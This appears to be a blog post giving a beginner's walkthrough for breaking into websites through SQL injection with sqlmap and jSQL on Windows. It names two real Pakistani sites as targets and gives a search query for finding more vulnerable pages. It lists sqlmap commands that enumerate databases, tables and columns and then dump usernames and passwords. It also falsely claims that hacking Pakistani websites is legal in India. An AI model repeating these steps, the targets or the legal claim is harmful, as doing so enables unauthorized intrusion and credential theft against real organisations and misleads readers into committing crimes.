Website hacking in Windows
Website Hacking in Windows
Hacking Website using windows is pretty easy.There are two easy methods.First you need to download python 2.7 and install it.After installing python download sqlmap.Extract it.
- Find out the vulnerable websites.Choose Pakistani website as it is legal to hack Pakistani website in India.Vulnerable websites are of the form "php?id="........First check whether the website is vulnerable or not by placing "'"(apostrophe) at the end of the website; if the website displays blankpage or sqlerror then it is vulnerable.Here are some websites which you can hack: https://www.citicollege.edu.pk/main.php?Id=1;http://www.cosspak.org/publications.php?id=5.You can find more by typing ".pk inurl:php?id" in google search bar.
- Open command prompt and navigate to the folder which contains sqlmap.
- Type "sqlmap.py -u "The website that you have chosen" --dbs" in command prompt.This will give you all the databases present in the website.
- Here's the flowchart regarding the data of a website.
- Website ==> Databases ==> Tables ==> Columns ==> Data
- Website contains Databases;Databases contain Tables;Tables contain Columns;Columns contain the data which we require i.e. the usernames and the passwords.
- Next step is to get tables from a database.Type "sqlmap.py -u "The website that you have chosen" --tables -D DATABASENAME ".
- Then proceed to columns by typing "sqlmap.py -u "The website that you have chosen" --columns -T TABLENAME -D DATABASENAME"
- Columns contain the data.So type the command "sqlmap.py -u "The website that you have chosen" --dump -T TABLENAME -D DATABASENAME" to dump(get) all the data which contains usernames and passwords.
You can watch my video to find answers to your queries.SQLmap process starts at 2:47 in my video.Here is the link:https://www.youtube.com/watch?v=vcr-IIy0ib8(at 2:47)
- You can directly hack a website just by using jSQL injection.For this you need java and it is fully automated.First download and install java and then download jSQL.Open it and directly paste the website you want to hack.

Comments
Post a Comment